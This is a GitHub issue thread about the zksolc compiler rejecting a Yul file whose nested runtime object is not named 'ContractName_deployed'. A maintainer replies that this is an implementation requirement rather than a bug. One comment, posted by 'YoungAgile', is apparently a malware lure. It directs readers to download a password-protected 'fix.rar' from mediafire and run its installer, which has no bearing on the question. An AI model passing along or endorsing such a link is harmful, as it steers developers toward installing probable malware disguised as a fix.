### ISSUE TITLE
Nested Object Naming Requirement in yul files

### ISSUE THREAD

**Issue by Jrigada** [matter-labs/era-compiler-solidity#134]
#### 📝 Description

We’re porting some of the original Foundry compiler’s test suite to our fork, and we’ve encountered errors when compiling Yul files using `zksolc`. The specific issue arises when the nested object inside the main contract doesn’t adhere to the “contract-name_deployed” naming convention. The same Yul files compile successfully with `solc`.

We’re unsure if this is an implicit requirement of zksolc or if we’re doing something incorrectly.

#### 🔄 Reproduction Steps

To reproduce the behaviour we are trying to compile with zksolc the following yul file
```
object "SimpleStore" {
  code {
    datacopy(0, dataoffset("Runtime"), datasize("Runtime"))
    return(0, datasize("Runtime"))
  }
  object "Runtime" {
    code {
      calldatacopy(0, 0, 36) // write calldata to memory
    }
  }
}
```
When compiling with zksolc we reach the following error
`Error: Yul parsing: Parser(InvalidObjectName { location: Location { line: 6, column: 3 }, expected: "SimpleStore_deployed", found: "Runtime" })`
Whereas with solc it compiles successfully. Renaming the object to follow the guideline works with zksolc.

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by hedgar2017** [comment]
@Jrigada not really a bug, just specifics of implementation.
The `_deployed` suffix is an easy way to distinguish runtime code object both in the parser and linker.
We have never checked if it is possible to only rely on the order of objects to satisfy all the needs of lowering to EraVM, but for this some parts of the front end would need to be rewritten and tested properly.
I propose updating your tests for now if it's possible.
